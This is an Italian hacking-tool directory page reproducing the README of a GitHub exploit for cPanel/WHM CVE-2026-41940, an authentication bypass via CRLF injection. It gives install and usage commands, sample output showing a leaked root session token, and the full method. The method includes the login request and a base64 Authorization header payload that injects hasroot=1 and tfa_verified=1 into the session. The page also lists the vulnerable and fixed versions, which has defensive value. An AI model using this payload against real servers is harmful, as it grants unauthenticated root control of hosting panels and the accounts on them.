Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/cerberusmrxi/cpanel-whm-cve-2026-41940-auth-bypass-exploit
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubcerberusmrxi/cpanel-whm-cve-2026-41940-auth-bypass-exploit

cPanel-WHM-CVE-2026-41940-auth-bypass-exploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
2122 mesi faNon ancora revisionato

Informazioni

Exploit critico di bypass dell'autenticazione per cPanel/WHM CVE-2026-41940. Sfrutta l'iniezione CRLF nel demone cpsrvd per ottenere accesso root a WHM senza credenziali. Include rilevamento della versione, logging dettagliato, supporto proxy, reporting JSON ed enumerazione degli account post-exploitation. Solo per test di sicurezza autorizzati.

Condividi

CVE-2026-41940 - Exploit di Bypass dell'Autenticazione di cPanel & WHM

PythonLicenseCVECVSSStatus

Bypass critico dell'autenticazione tramite iniezione CRLF nel daemon cpsrvd di cPanel/WHM


📋 Panoramica

CVE-2026-41940 è una vulnerabilità critica di bypass dell'autenticazione in cPanel & WHM che consente ad attaccanti remoti non autenticati di ottenere accesso amministrativo di livello root al server. La vulnerabilità risiede nella gestione delle sessioni del daemon cpsrvd, in particolare in Cpanel/Session.pm, dove la neutralizzazione impropria dei delimitatori di riga (CRLF) nel cookie whostmgrsession e negli header Authorization consente l'iniezione di parametri di sessione.

Punteggio CVSSTipo di ExploitImpattoVettore di Attacco
9.8Bypass dell'AutenticazioneAccesso RootRete
c

⚡ Caratteristiche Principali

Questo strumento di exploit offre le seguenti caratteristiche principali:

  • 🔓 Bypass dell'Autenticazione - Ottieni accesso root a WHM senza credenziali

  • 🛡️ Tecniche di Bypass Multiple - Prova automaticamente diversi metodi di verifica

  • 🌐 Supporto Proxy - Instrada il traffico attraverso proxy HTTP/HTTPS

  • 📊 Report JSON - Genera report di valutazione dettagliati

  • 📝 Registrazione Completa - Modalità di debug estesa con timestamp

  • 🔍 Rilevamento Versione - Rileva e verifica automaticamente le versioni vulnerabili

  • 👥 Enumerazione Account - Elenca tutti gli account cPanel post-exploit

  • 🎯 Endpoint Multipli - Tenta vari endpoint API per la verifica


🚨 Dettagli della Vulnerabilità

AttributoValore
ID CVECVE-2026-41940
Punteggio CVSS9.8 (Critico)
Tipo di VulnerabilitàBypass dell'Autenticazione tramite Iniezione CRLF
Componente Interessatodaemon cpsrvd (Cpanel/Session.pm)
Vettore di AttaccoRete
ImpattoAccesso Root Completo
SfruttamentoRemoto Non Autenticato

🔬 Analisi Tecnica

La vulnerabilità deriva da due problemi principali:

  1. Iniezione CRLF nello Storage delle Sessioni - La funzione saveSession non sanifica i caratteri di nuova riga (\n) nel campo pass prima di scrivere nel file di sessione, consentendo l'iniezione di parametri di sessione arbitrari.

  2. Bypass Condizionale della Codifica - Quando il cookie di sessione non contiene la parte ob (il segmento dopo la virgola), il valore di pass viene scritto non codificato (in chiaro), abilitando l'iniezione di sequenze CRLF.

🎯 Versioni Interessate

Canale di RilascioVulnerabile Fino aVersione Corretta
11.110.x11.110.0.9611.110.0.97
11.118.x11.118.0.6211.118.0.63
11.126.x11.126.0.5311.126.0.54
11.132.x11.132.0.2811.132.0.29
11.134.x11.134.0.1911.134.0.20
11.136.x11.136.0.411.136.0.5

📦 Installazione

Prerequisiti

# Python 3.6 or higher required
python3 --version

# Install required packages
pip install -r requirements.txt

File dei Requisiti

requests>=2.28.0
urllib3>=1.26.0

Clonazione del Repository

git clone https://github.com/CerberusMrXi/cPanel-WHM-CVE-2026-41940-auth-bypass-exploit.git
cd cPanel-WHM-CVE-2026-41940-auth-bypass-exploit

🚀 Utilizzo

Utilizzo di Base

python3 exploit.py --target https://target.com:2087

Utilizzo Avanzato

# Verbose mode with debug output
python3 exploit.py --target https://target.com:2087 --verbose

# Through proxy
python3 exploit.py --target https://target.com:2087 --proxy http://127.0.0.1:8080

# Save report and list accounts
python3 exploit.py --target https://target.com:2087 --output report.json --list-accounts

# Custom timeout
python3 exploit.py --target https://target.com:2087 --timeout 30

Esempio di Output

=======================================================
 CVE-2026-41940 - cPanel/WHM Authentication Bypass
 Critical CRLF Injection in cpsrvd (CVSS: 9.8 )
 Exploit Version: 1.0
=======================================================
 Target      : https://target.com:2087
 Started     : 2026-07-26 22:23:18
=======================================================
2026-07-26 22:23:18 [INFO] Detecting cPanel/WHM version...
2026-07-26 22:23:19 [INFO] Version: 11.110.0.85 - Vulnerable
2026-07-26 22:23:19 [INFO] Attempting to mint pre-authentication session...
2026-07-26 22:23:20 [INFO] Pre-authentication session obtained successfully
2026-07-26 22:23:20 [INFO] Injecting CRLF payload via Authorization header...
2026-07-26 22:23:21 [INFO] Token leaked: /cpsess1234567890
2026-07-26 22:23:21 [INFO] Verifying root access with multiple bypass techniques...
2026-07-26 22:23:25 [INFO] Access verified with URL format: /cpsess-{token}

=======================================================
 EXPLOIT SUCCESSFUL
=======================================================
 Target              : https://target.com:2087
 Token               : /cpsess1234567890
 Admin URL           : https://target.com:2087/cpsess1234567890/
 Version             : 11.110.0.85
 Verification Method : url_format
 Completed           : 2026-07-26 22:23:25
=======================================================

[!] Access WHM with the token above
[!] Use the token in all subsequent requests
[!] Example: curl -k "https://target.com:2087/cpsess1234567890/json-api/version?api.version=1"
=======================================================

🔧 Argomenti della Riga di Comando

ArgomentoBreveRichiestoDescrizione
--target-t✅URL del target (es. https://target.com:2087 )
--verbose-v❌Abilita output verboso/di debug
--proxy-p❌URL del proxy (es. http://127.0.0.1:8080 )
--output-o❌File di output per il report JSON
--timeout❌Timeout della richiesta in secondi (predefinito: 10)
--list-accounts-l❌Elenca gli account cPanel dopo un exploit riuscito
--version❌Mostra la versione dell'exploit

🔬 Metodologia dell'Exploit

Fase 1: Ottenere una Sessione Pre-Autenticazione

L'exploit ottiene prima un cookie di sessione pre-autenticazione tentando un accesso fallito:

POST /login/?login_only=1 HTTP/1.1
Host: target.com:2087
Content-Type: application/x-www-form-urlencoded

user=root&pass=wrong_pass

Risposta:

Set-Cookie: whostmgrsession=base64_encoded_data

Fase 2: Iniezione CRLF

L'header Authorization appositamente costruito inietta parametri di sessione dannosi:

GET / HTTP/1.1
Host: target.com:2087
Authorization: Basic cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x
Cookie: whostmgrsession=[SESSION_BASE]

Payload Decodificato:

root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

Fase 3: Estrazione del Token

Scarica lo strumento